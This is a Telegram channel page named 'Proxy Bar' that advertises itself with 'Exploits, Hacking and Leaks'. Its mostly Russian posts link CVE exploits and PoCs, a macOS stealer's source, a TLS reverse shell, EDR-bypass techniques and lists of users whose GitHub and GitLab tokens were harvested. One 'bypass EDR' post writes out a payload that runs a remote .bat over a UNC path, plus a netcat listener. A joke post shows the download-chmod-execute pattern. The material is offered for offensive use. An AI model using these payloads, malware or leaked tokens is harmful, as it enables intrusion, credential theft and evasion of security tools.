Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
С днем рождения !!!!
Сегодня Proxy Bar исполняется 3 года
***
Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:
# был перестроен чат
# набралась команда админов (хорошие специалисты и прекрасные люди)
# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)
*
Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:
заходите на proxy-bar.org там есть краткое описание, из основного
это секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека
*
С праздником, и Вас и Нас ! 😜
*
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Donate:
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker

#lденьрождения #админы #всевсевсе
🔥130👍23😱9
XOR
Encrypted Shellcode Execution via Desktop Enumeration
*
Link
👍8
MacOS Stealer
*
source code
🔥34👍3
HellPot — это кроссплатформенный портал бесконечных страданий, предназначенный для наказания неуправляемых HTTP-ботов. 😁😄
Описание ТОП )
Link
👍23🔥8😱4
This media is not supported in your browser
VIEW IN TELEGRAM
XSS в 2024
и смешно и грустно
🔥147👍21😱18
bypass EDR
*
payload
https://&cmd/c\\\\192.168.2.15\\Public\\aa.bat
nc -lvnp 4444

+ еще decimal можно
👍26😱9🔥6
CVE-2024-44285
*
panic iOS 18.0/18.0.1
*
POC
🔥19👍2😱1
Exploit-Street Улица Сезам
*
LPE exploits для Windows (2023\2024)
*
Link
👍15🔥8😱3
Linux Malware Development:
Создание reverse shell на основе TLS/SSL на Python
*
writeUP
*
source: reverse_ssl.py
🔥24👍2
CVE-2024-11320 Pandora FMS
*
RCE exploit
👍11
fucking monday
sudo wget cofee_and_cat.sh
chmod +x cofee_and_cat.sh
./cofee_and_cat.sh
👍25🔥9
CVE-2024-44308 Apple (Safari)
*
RCE
*
WriteUp + POC
*
👍10🔥6😱2
AWS
Unauthorized Access to Metadata and User Data
*
Link
👍13😱5🔥3
Kernel (Linux) _#
*
В ядре Linux в системных вызовах exec существует проблема времени проверки/времени использования. Разрешения на выполнение проверяются в другое время, чем применяется бит set-user-ID. Это LPE.
Есть два состояния бинаря (условно), которые должны быть безопасными:
1. Бинарь имеет root-идентификатор + set-user-ID, но хакеру его не исполнить.
2. Бинарь не имеет руть идентификатора, потому может быть выполнен хакером.
*
А вот тут то и впрягается состояния гонки, как и в реальном мире, старичок бит может не успеть выпить таблетки
*
Proof of Concept

#LPE #linux #ricecondition #kernel
🔥18😱4👍3
CVE-2024-42327 / ZBX-25623
*
zabbix SQLi
*
POC
🔥32👍5😱3
Channel photo updated
Рубрика .git leaks
*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с Gi7w0rm , добряки )))
👍29😱6🔥5
CVE-2024-11680 ProjectSend r1605
*
Exploit
👍11
CVE-2024-51378 CyberPanel Command Injection
*
WriteUp
*
exploit
👍7
BootExecute EDR Bypass
*
Грузи малварь от ntdll.dll — до полной загрузки операционной системы Windows.
Метод и правда старый и много где используется, всегда логика была в том что бы стартануть раньше AV\EDR и даже килять его (хуки там всякие и тд).
*
D0wnL0@d
🔥17👍3😱1